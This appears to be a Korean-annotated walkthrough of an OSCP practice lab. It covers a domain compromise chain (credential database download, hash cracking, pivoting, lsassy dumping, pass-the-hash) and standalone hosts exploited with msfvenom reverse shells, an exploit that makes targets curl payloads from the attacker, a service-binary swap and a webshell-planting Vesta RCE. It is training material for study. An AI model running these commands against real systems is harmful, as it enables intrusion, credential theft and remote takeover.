Information
About this lab
This lab guides learners through an Active Directory exploitation chain, beginning with credential discovery in a SQLite database on an exposed web server. By cracking the credentials, learners gain access to an internal system via WinRM, escalate privileges through binary analysis and pivoting, and extract the domain administrator hash to achieve full domain compromise.
Active Directory Set
192.168.135.153 - MS01
Eric.Wallows / EricLikesRunning800Nmap
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
8000/tcp open http-altInformation Gathering
feroxbuster로 웹 스캔
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ feroxbuster -u http://192.168.135.153:8000 -s 200 -t 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.135.153:8000/
🚩 In-Scope Url │ 192.168.135.153
🚀 Threads │ 200
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 359l 2112w 178556c http://192.168.135.153:8000/iisstart.png
200 GET 32l 54w 696c http://192.168.135.153:8000/
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/db
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/DB
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/db
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/CHANGELOG
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/DB
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/CHANGELOG
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/changelog
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/changelog
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/Dbdb 파일 다운로드
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ wget http://192.168.135.153:8000/partner/db
--2025-12-26 01:52:36-- http://192.168.135.153:8000/partner/db
Connecting to 192.168.135.153:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16384 (16K) [application/octet-stream]
Saving to: ‘db’
db 100%[=====================================================>] 16.00K --.-KB/s in 0.08s
2025-12-26 01:52:36 (194 KB/s) - ‘db’ saved [16384/16384]db 파일에서 계정 정보 발견
- ecorp,7007296521223107d3445ea0db5a04f9
- support,26231162520c611ccabfb18b5ae4dff2
- bcorp,e7966b31d1cad8a83f12ecec236c384c
- acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ cat db.json
id,name,password,desc
1,ecorp,7007296521223107d3445ea0db5a04f9,-
2,support,26231162520c611ccabfb18b5ae4dff2,support account for internal use
3,bcorp,e7966b31d1cad8a83f12ecec236c384c,-
4,acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e,-Initial Access
ssh
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh Eric.Wallows@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Eric.Wallows@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
oscp\eric.wallows@MS01 C:\Users\eric.wallows>Enumerated local user
*Evil-WinRM* PS C:\> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Mary.Williams support WDAGUtilityAccount
The command completed with one or more errors.Privilege Escalation
admintool.exe 발견
oscp\eric.wallows@MS01 C:\Users\eric.wallows>dir
Volume in drive C has no label.
Volume Serial Number is 3C99-887F
Directory of C:\Users\eric.wallows
02/03/2025 01:14 PM <DIR> .
02/03/2025 01:14 PM <DIR> ..
11/21/2022 04:49 AM 6,102,702 admintool.exe
12/07/2019 01:14 AM <DIR> Desktop
12/25/2025 10:23 PM <DIR> Documents
12/07/2019 01:14 AM <DIR> Downloads
12/07/2019 01:14 AM <DIR> Favorites
12/07/2019 01:14 AM <DIR> Links
12/07/2019 01:14 AM <DIR> Music
12/07/2019 01:14 AM <DIR> Pictures
12/07/2019 01:14 AM <DIR> Saved Games
12/07/2019 01:14 AM <DIR> Videos
1 File(s) 6,102,702 bytes
11 Dir(s) 10,279,878,656 bytes freeadmintool.exe 실행
- administrator hash 발견
- 05f8ba9f047f799adbea95a16de2ef5d
oscp\eric.wallows@MS01 C:\Users\eric.wallows>admintool.exe whoami
Enter administrator password:
thread 'main' panicked at 'assertion failed: `(left == right)`
left: `"d41d8cd98f00b204e9800998ecf8427e"`,
right: `"05f8ba9f047f799adbea95a16de2ef5d"`: Wrong administrator password!', src/main.rs:78:5
note: run with `RUST_BACKTRACE=1` environment variable to display a backtracehash 크랙
- https://hashes.com/en/decrypt/hash
- December31
- Freedom1
- ecorp
- Raid123!
- bcorp123!
05f8ba9f047f799adbea95a16de2ef5d:December31
26231162520c611ccabfb18b5ae4dff2:Freedom1
7007296521223107d3445ea0db5a04f9:ecorp
df5fb539ff32f7fde5f3c05d8c8c1a6e:Raid123!
e7966b31d1cad8a83f12ecec236c384c:bcorp123!
administrator로 ssh 접속 성공
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh administrator@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
administrator@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
administrator@MS01 C:\Users\Administrator>Post-Exploitation
powershell history 확인
- 비밀번호로 추정되는 정보 발견
- hghgib6vHT3bVWf
PS C:\Users\Administrator\Documents> (Get-PSReadlineOption).HistorySavePath
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
PS C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type *
C:\users\support\admintool.exe hghgib6vHT3bVWf cmd
C:\users\support\admintool.exe cmd
shutdown /r /t 7
cd Documents
dir
powershell -ep bypass
.\mimikatz.exe
clear
(Get-PSReadlineOption).HistorySavePath
cd C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
type *
C:\users\support\admintool.exe hghgib6vHT3bVWf cmd
C:\users\support\admintool.exe cmdPivoting
kali
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] daemon configuration file not found. Creating a new one...
? Enable Ligolo-ng WebUI? No
WARN[0001] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
ERRO[0001] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0001] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0058] Agent joined. id=005056ab5af9 name="MS01\\Administrator@MS01" remote="192.168.135.153:52168"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - MS01\Administrator@MS01 - 192.168.135.153:52168 - 005056ab5af9
[Agent : MS01\Administrator@MS01] » interface_create --name ligolo
INFO[0081] Creating a new ligolo interface...
INFO[0081] Interface created!
[Agent : MS01\Administrator@MS01] » start
INFO[0084] Starting tunnel to MS01\Administrator@MS01 (005056ab5af9)
[Agent : MS01\Administrator@MS01] » route_add --name ligolo --route 10.10.68.0/24
INFO[0101] Route created. ms01
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\agent.exe -connect 192.168.`111111`:11601 -ignore-cert
agent.exe : time="2025-12-25T23:38:58-08:00" level=warning msg="warning, certificate validation disabled"
+ CategoryInfo : NotSpecified: (time="2025-12-2...ation disabled":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
time="2025-12-25T23:38:59-08:00" level=info msg="Connection established" addr="192.168.45.199:11601"10.10.68.154 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsmanLateral Movement (MS01 to MS02)
nxc winrm
- administrator:hghgib6vHT3bVWf 인증 성공
┌──(kali🎃kali)-[~/oscp/ad]
└─$ nxc winrm 10.10.68.154 -u users.txt -p password.txt -t 100 --continue-on-success --local-auth
WINRM 10.10.68.154 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.68.154 5985 MS02 [-] MS02\administrator:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:EricLikesRunning800
<SNIP>
WINRM 10.10.68.154 5985 MS02 [-] MS02\bcorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [-] MS02\acorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:hghgib6vHT3bVWf
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:hghgib6vHT3bVWfwinrm 접속
┌──(kali🎃kali)-[~/oscp/ad]
└─$ evil-winrm -i 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Post-Exploitation
nxc lsassy module
- administrator:hghgib6vHT3bVWf
┌──(kali🎃kali)-[~/oscp/ad/154]
└─$ nxc smb 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf' --local-auth -M lsassy
SMB 10.10.68.154 445 MS02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS02) (domain:MS02) (signing:False) (SMBv1:False)
SMB 10.10.68.154 445 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
LSASSY 10.10.68.154 445 MS02 OSCP\Administrator 59b280ba707d22e3ef0aa587fc29ffe510.10.68.152 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanLateral Movement (MS02 to DC01)
ms02에서 획득한 administrator ntlm 해시로 winrm 인증 성공
┌──(kali🎃kali)-[~]
└─$ nxc winrm 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
WINRM 10.10.68.152 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.68.152 5985 DC01 [+] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 (Pwn3d!)
WINRM 10.10.68.152 5985 DC01 [-] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 zip() argumenwinrm 접속
┌──(kali🎃kali)-[~]
└─$ evil-winrm -i 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
1cfa2fd5d9f96abf7da31c2a724927a4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.68.152
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.68.254Independent Challenge
192.168.135.155 - Pascha
Nmap
PORT STATE SERVICE
80/tcp open http
9099/tcp open unknown
9999/tcp open abyssInitial Access
searchsploit abyss
┌──(kali🎃kali)-[~/oscp/155]
└─$ searchsploit abyss
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Abyss Web Server 1.0 - Encoded Backslash Directory Traversal | windows/remote/21735.txt
Abyss Web Server 1.0 - File Disclosure | windows/remote/21367.txt
Abyss Web Server 1.0/1.1 - Authentication Bypass | windows/remote/23419.txt
Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service | windows/dos/22460.txt
Abyss Web Server < 2.11.6 - Heap Memory Corruption | windows/dos/43207.txt
Abyss Web Server X1 - Cross-Site Request Forgery | windows/webapps/12640.txt
Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation | windows/local/40460.txt
Abyssal Metal Player 2.0.9 - Denial of Service | windows/dos/14713.py
-------------------------------------------------------------------------------------------- ---------------------------------search “9099/tcp open unknown vuln”
- Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
- https://www.exploit-db.com/exploits/51010
Downloaded POC
┌──(kali🎃kali)-[~/oscp/155]
└─$ searchsploit -m 51010
Exploit: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51010
Path: /usr/share/exploitdb/exploits/windows/remote/51010.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/oscp/155/51010.pyreverse shell 파일 생성
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9099 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: met.exe8080 포트로 met.exe 파일 다운받을 수 있는 http 서버 오픈
┌──(kali🎃kali)-[~/oscp/155]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...9099 포트로 NC 리스너 실행
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...POC 코드 실행
┌──(kali🎃kali)-[~/oscp/155]
└─$ python 51010.py --target 192.168.135.155 --file met.exe --lhost 192.168.45.199
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\{'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\W'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\{'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\W'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
Executing The Command Shell...
Take The Rosenc reverse shell 연결 성공
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 53346
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\Temp>Read local.txt
PS C:\Users\tim\Desktop> type local.txt
type local.txt
7bcaf20a94dc192a17c0ea06bdd45366
PS C:\Users\tim\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::fdb5:ada4:541a:7a21
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254Privilege Escalation
powerup
- GPGOrchestrator 서비스에 사용되는 “C:\Program Files\MilleGPG5\GPGService.exe” 파일 수정 가능
ServiceName : GPGOrchestrator
Path : "C:\Program Files\MilleGPG5\GPGService.exe"
ModifiableFile : C:\Program Files\MilleGPG5\GPGService.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'GPGOrchestrator'
CanRestart : True
Name : GPGOrchestrator
Check : Modifiable Service Files9999번 포트로 리버스 쉘 연결하는 payload.exe 파일 생성
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9999 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exeGPGOrchestrator 서비스 종료 후 GPGService.exe를 payload.exe로 변경
PS C:\Users\Tim\Desktop> sc.exe stop GPGOrchestrator
sc.exe stop GPGOrchestrator
SERVICE_NAME: GPGOrchestrator
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\Tim\Desktop> cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"
cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"GPGOrchestrator 서비스 실행
PS C:\Users\Tim\Desktop> sc.exe start GPGOrchestrator
sc.exe start GPGOrchestrator
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.9999번 포트로 nc 연결 성공
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 55262
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>Read proof.txt
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2025 6:59 AM 34 proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
f467f9374a3d455ce6a49eb39ac0328a
PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2349:460f:c907:a12c%4
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254192.168.135.156 - Frankfurt
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2525/tcp open ms-v-worlds
3306/tcp open mysql
8080/tcp open http-proxy
8083/tcp open us-srv
8443/tcp open https-alt
53/udp open domain
161/udp open snmpInitial Access & Privilege Escalation
snmp community string 확인
- public
┌──(kali🎃kali)-[~/oscp/156]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.135.156
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 10:54:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.135.156:161/
[161][snmp] host: 192.168.135.156 password: public
[STATUS] attack finished for 192.168.135.156 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 10:54:28snmpwalk
- jack 계정 비밀번호 초기화한 것을 확인
- jack:3PUKsX98BMupBiCf
┌──(kali🎃kali)-[~/oscp/156]
└─$ snmpwalk -v2c -c public 192.168.135.156 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password-cmd" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password" = STRING: -c "echo \"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password-cmd" = STRING: "\"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password-cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password-cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password-cmd" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password-cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password-cmd" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password-cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password-cmd" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password" = INTEGER: 256
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password-cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password".1 = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password-cmd".1 = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd8083 포트 웹 접속
- Vesta 서비스 로그인 페이지 존재
- jack:3PUKsX98BMupBiCf 으로 로그인 성공
vesta 서비스 RCE 취약점 발견
이전에 로그인에 성공한 jack 계정 정보 가지고 poc 실행
- root 권한 획득
┌──(kali🎃kali)-[~/oscp/156/vesta-rce-exploit]
└─$ python vesta-rce-exploit.py https://192.168.135.156:8083 jack 3PUKsX98BMupBiCf
[INFO] Attempting login to https://192.168.135.156:8083 as jack
[+] Logged in as jack
[INFO] Checking for existing webshell or creating one
[!] xzy0qvzq2m.poc not found, creating one...
[+] xzy0qvzq2m.poc added
[+] xzy0qvzq2m.poc found, looking up webshell
[!] webshell not found, creating one..
[+] Webshell uploaded
[INFO] Creating mailbox on domain xzy0qvzq2m.poc
[!] Mail domain not found, creating one..
[+] Mail domain created
[+] Mail account created
[INFO] Editing mailbox to test payload
[INFO] Deploying backdoor via mailbox editing
[INFO] [+] Root shell possibly obtained. Enter commands:
# id
uid=0(root) gid=0(root) groups=0(root)Read local.txt
# cat /home/jack/local.txt
9cfca959e54738e70905a4024d16a44a
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94989 bytes 6111879 (6.1 MB)
RX errors 0 dropped 757 overruns 0 frame 0
TX packets 84189 bytes 7450035 (7.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8205 bytes 847767 (847.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8205 bytes 847767 (847.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Read proof.txt
# cat /root/proof.txt
07fd2596d9afbb88f7864b5dd02244ea
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94102 bytes 6021197 (6.0 MB)
RX errors 0 dropped 755 overruns 0 frame 0
TX packets 83675 bytes 6854793 (6.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 7483 bytes 765378 (765.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7483 bytes 765378 (765.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0192.168.135.157 - Charlie
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
20000/tcp open dnpInitial Access
ftp anonymous 로그인 성공
┌──(kali🎃kali)-[~/oscp/157]
└─$ ftp 192.168.135.157
Connected to 192.168.135.157.
220 (vsFTPd 3.0.5)
Name (192.168.135.157:kali): anonymous
331 Please specify the password.
Password:
230 Login successfulbackup 디레토리 내 pdf 파일 들 발견
ftp> ls
229 Entering Extended Passive Mode (|||10097|)
150 Here comes the directory listing.
drwxr-xr-x 2 114 120 4096 Nov 02 2022 backup
226 Directory send OK.
ftp> cd backup
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10099|)
150 Here comes the directory listing.
-rw-r--r-- 1 114 120 145831 Nov 02 2022 BROCHURE-TEMPLATE.pdf
-rw-r--r-- 1 114 120 159765 Nov 02 2022 CALENDAR-TEMPLATE.pdf
-rw-r--r-- 1 114 120 336971 Nov 02 2022 FUNCTION-TEMPLATE.pdf
-rw-r--r-- 1 114 120 739052 Nov 02 2022 NEWSLETTER-TEMPLATE.pdf
-rw-r--r-- 1 114 120 888653 Nov 02 2022 REPORT-TEMPLATE.pdfpdf 다운로드
ftp> mget *
mget BROCHURE-TEMPLATE.pdf [anpqy?]? a
Prompting off for duration of mget.
229 Entering Extended Passive Mode (|||10096|)
150 Opening BINARY mode data connection for BROCHURE-TEMPLATE.pdf (145831 bytes).
100% |***************************************************************************| 142 KiB 319.42 KiB/s 00:00 ETA
226 Transfer complete.
145831 bytes received in 00:00 (241.87 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for CALENDAR-TEMPLATE.pdf (159765 bytes).
100% |***************************************************************************| 156 KiB 338.52 KiB/s 00:00 ETA
226 Transfer complete.
159765 bytes received in 00:00 (254.41 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for FUNCTION-TEMPLATE.pdf (336971 bytes).
100% |***************************************************************************| 329 KiB 396.25 KiB/s 00:00 ETA
226 Transfer complete.
336971 bytes received in 00:00 (341.38 KiB/s)
229 Entering Extended Passive Mode (|||10094|)
150 Opening BINARY mode data connection for NEWSLETTER-TEMPLATE.pdf (739052 bytes).
100% |***************************************************************************| 721 KiB 535.89 KiB/s 00:00 ETA
226 Transfer complete.
739052 bytes received in 00:01 (487.95 KiB/s)
229 Entering Extended Passive Mode (|||10098|)
150 Opening BINARY mode data connection for REPORT-TEMPLATE.pdf (888653 bytes).
100% |***************************************************************************| 867 KiB 722.38 KiB/s 00:00 ETA
226 Transfer complete.
